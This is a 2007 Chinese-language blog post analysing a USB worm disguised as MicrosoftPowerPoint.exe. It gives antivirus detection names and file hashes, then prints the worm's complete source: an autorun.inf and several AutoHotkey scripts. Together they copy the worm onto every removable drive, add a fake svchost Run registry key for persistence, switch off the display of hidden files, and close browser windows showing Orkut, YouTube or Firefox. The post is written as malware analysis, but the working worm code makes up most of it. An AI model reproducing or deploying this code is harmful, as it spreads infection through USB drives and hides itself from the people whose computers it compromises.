2007年10月7日星期日

MicrosoftPowerPoint.exe 病毒

最近老是在朋友的电脑和U盘发现一种MicrosoftPowerPoint.exe 病毒~这个病毒可以说是一种木马吧~利用autorun.inf启动。。。

以下是用多种防毒软件扫描的结果~
文件 MicrosoftPowerPoint.exe 接收于 2007.10.07 06:41:45 (CET)
反病毒引擎版本最后更新扫描结果
AhnLab-V32007.10.6.02007.10.05Win32/Muha.worm.462050
AntiVir7.6.0.202007.10.05DR/Agent.aoe.1
Authentium4.93.82007.10.05is a security risk or a \"backdoor\" program
Avast4.7.1051.02007.10.06Win32:Agent-HYM
AVG7.5.0.4882007.10.06Worm/Small.2.F
BitDefender7.22007.10.07Trojan.Agent.AACH
CAT-QuickHeal9.002007.10.06Worm.Muha.a
ClamAV0.91.22007.10.07Trojan.Mozban
DrWeb4.44.0.091702007.10.06Win32.HLLW.Offring
eSafe7.0.15.02007.10.04Win32.Trojan
eTrust-Vet31.2.51902007.10.06Win32/AHKHeap.A
Ewido4.02007.10.06-
FileAdvisor12007.10.07High threat detected
Fortinet3.11.0.02007.10.07Misc/AutoHotKey
F-Prot4.3.2.482007.10.06W32/Worm!adbb
F-Secure6.70.13030.02007.10.06Worm.Win32.Muha.a
IkarusT3.1.1.122007.10.07Worm.Win32.Muha.a
Kaspersky7.0.0.1252007.10.07Worm.Win32.Muha.a
McAfee51352007.10.05W32/AHKHeap
Microsoft1.29082007.10.07-
NOD32v225762007.10.07Win32/AHKHeap.A
Norman5.80.022007.10.05Smalltroj.BHFI
Panda9.0.0.42007.10.06W32/AHKHeap.A.worm
Prevx1V22007.10.07-
Rising19.43.50.002007.10.06Trojan.Win32.Agent.aoe
Sophos4.22.02007.10.06W32/AHKHeap-A
Sunbelt2.2.907.02007.10.06-
Symantec102007.10.07Trojan.Dropper
TheHacker6.2.6.0782007.10.06W32/Muha.a
VBA323.12.2.42007.10.05Worm.Win32.Muha.a
VirusBuster4.3.26:92007.10.06Worm.DR.Muha.C
Webwasher-Gateway6.0.12007.10.05Trojan.Agent.aoe.1

附加信息
File size: 462050 bytes
MD5: 4f30003916cc70fca3ce6ec3f0ff1429
SHA1: 7a12afdc041a03da58971a0f7637252ace834353
Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=4f30003916cc70fca3ce6ec3f0ff1429


其实多种防毒软件都能检测到,所以也不算有什么威胁性~

经我测试--病毒包含两个文件件~以下是编码

autorun.inf

[Autorun]
open=MicrosoftPowerPoint.exe
shellexecute=MicrosoftPowerPoint.exe
shell\Auto\command=MicrosoftPowerPoint.exe

MicrosoftPowerPoint.exe

drivelist

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z


reproduce

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

script1

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r牋牋牋牋OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}

}
return


std

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

值得一提的是病毒作者对firefox似乎有点过节---一打开firefox就会提示窗~
I Dont hate Mozilla but use IE or Else

有点针对firefox似的~。。。呵呵~

没有评论: